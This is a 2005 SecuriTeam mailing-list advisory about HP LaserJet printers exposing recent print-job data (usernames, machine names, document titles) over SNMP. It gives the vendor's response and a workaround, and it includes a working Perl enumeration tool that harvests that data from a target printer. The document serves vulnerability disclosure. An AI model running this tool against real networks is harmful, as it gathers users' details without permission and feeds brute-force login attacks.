[EXPL] HP LaserJet Network Username and Information Enumeration

From: SecuriTeam (support_at_securiteam.com)
Date: 09/27/05

  • Next message: SecuriTeam: "[UNIX] Webmin and Usermin PAM Authentication Bypass Vulnerability" 
    To: list@securiteam.com
Date: 27 Sep 2005 15:36:39 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      HP LaserJet Network Username and Information Enumeration
    ------------------------------------------------------------------------

    SUMMARY

    HP LaserJet printers has an extensive administrative user interface
    provided over SNMP. SNMP is normally used for monitoring applications and
    servers performance but can also be used to perform remote configurations.

    HP LaserJet stores network information from document print requests, this
    information accessible via SNMP, thus allowing malicious attacker to
    map/enumerate network.

    DETAILS

    Vulnerable Systems:
     * HP LaserJet 2430, (Possibly other HP printers that operate using the
    Jetdirect controls.)

    HP LaserJet printers store information regarding recently printed
    documents. Information such as document name, title, number of pages,
    document size, user who has printed the document and the machine name
    where the print job was initiated.

    This document information "cache" is flushed when the document is older
    then one hour but in mean time, the information can be obtained by anyone
    with access to the network and who has information regarding the "public"
    SNMP community configured at the printer.

    In reality, an intruder could use this information to obtain possible
    usernames that later could be used in a login brute force attack against
    servers.

    Vendor Status:
    Hewlet Packard was informed about this issue on September 7, 2005.
    Vendor response: "This information is kept by the printer in the printer
    specific MIB. Jetdirect controls the authentication and subsequent
    authorization to all the MIBs. This authentication/authorization can be
    controlled via SNMP settings."
    HP tracking number: SSRT051032

    Workaround:
    There is no direct way to prevent the printer from exposing information
    about recently printed documents except for disabling SNMP.
    Access to administrative features of the LaserJet, including SNMP, can be
    controlled and limited in various ways depending on the security
    requirements of the customer's environment. For more information please
    refer to "HP Jetdirect Embedded Print Server Administrator's Guide",
    chapter 7 - Security Features.

    References:
     
    <http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?locale=en_US&contentType=SupportManual&docIndexId=3124&prodTypeId=18972&prodSeriesId=416419&lang=en&cc=us> "HP Jetdirect Embedded Print Server Administrator's Guide"

    Additional information regarding HP Jetdirect security is availablehere:
     
    <http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999> http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999
     
    <http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00004828> http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00004828

    Exploit:
    The tool attached provides a possibility to extract the described
    information.

    #!/usr/bin/perl
    ###################################
    #
    # HP LaserJet SNMP User name enumeration tool v0.2 by
    # Pinion Labs 050705
    # george[46]hedfors[64]pinion[46]se
    # http://www.pinion.se
    #
    # Description
    # HP LaserJet printers loggs recent printed documents with
    # timestamp, size, number of pages, username and machine name.
    # These can be extracted using a specially crafted SNMP Object ID.
    #
    # Document name under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1
    # Document pages under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12
    # Document size under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14
    # Usernames are found under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1
    # Machine names under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2
    #
    # Output format
    # DocID:Username:Machine:Pages:Size:DocName
    #
    #

    use Net::SNMP;

    # Number of errors in row that is tolerated before exit
    $tolerance = 10;
    # Default SNMP community to use
    $defcommunity = "public";
    # Default SNMP port to use
    $defport = 161;

    ## END OF CONFIG ##

    $host = $ARGV[0] || die "syntax: $0 victim.com \[community\] ".
                                 "\[startid\]\n";
    $community = $ARGV[1] || $defcommunity;
    $startid = $ARGV[2] || 0;

    ($session, $error) = Net::SNMP->session(-hostname => $host,
                                            -community => $community,
                                            -port => $defport);

    if (!defined($session)) {
     printf("ERROR: %s.\n", $error);
     exit 1;
    }

    for($i = $startid; $err < $tolerance; $i++) {
     $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1.$i.0";
     $result = $session->get_request(-varbindlist => [$oid]);

     if (!defined($result)) {
      if($found > 0) {
       $err++;
      }
     } else {
      $found++;

      ($null, $user) = split(/\=/, $result->{$oid}, 2);

      $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2.$i.0";
      $result = $session->get_request(-varbindlist => [$oid]);
      ($null, $id) = split(/\=/, $result->{$oid}, 2);

      $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1.$i.0";
      $result = $session->get_request(-varbindlist => [$oid]);
      $doc = hex2ascii($result->{$oid});

      $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12.$i.0";
      $result = $session->get_request(-varbindlist => [$oid]);
      $pages = $result->{$oid};

      $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14.$i.0";
      $result = $session->get_request(-varbindlist => [$oid]);
      $size = $result->{$oid};

      printf("%d:%s:%s:%s:%s:%s\n", $i, $user, $id, $pages, $size, $doc);

      $err = 0;
     }
    }

    $session->close;

    exit 0;

    sub hex2ascii() {
     my $hex = shift;
     my $asc;

      for($n = 6; $n < length($hex); $n += 2) {
      $asc .= chr(hex(substr($hex, $n, 2)));
     }

     return $asc;
    }

    ADDITIONAL INFORMATION

    The information has been provided by George Hedfors.
    The original article can be found at: <http://www.pinion.se>
    http://www.pinion.se

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Webmin and Usermin PAM Authentication Bypass Vulnerability"

    Relevant Pages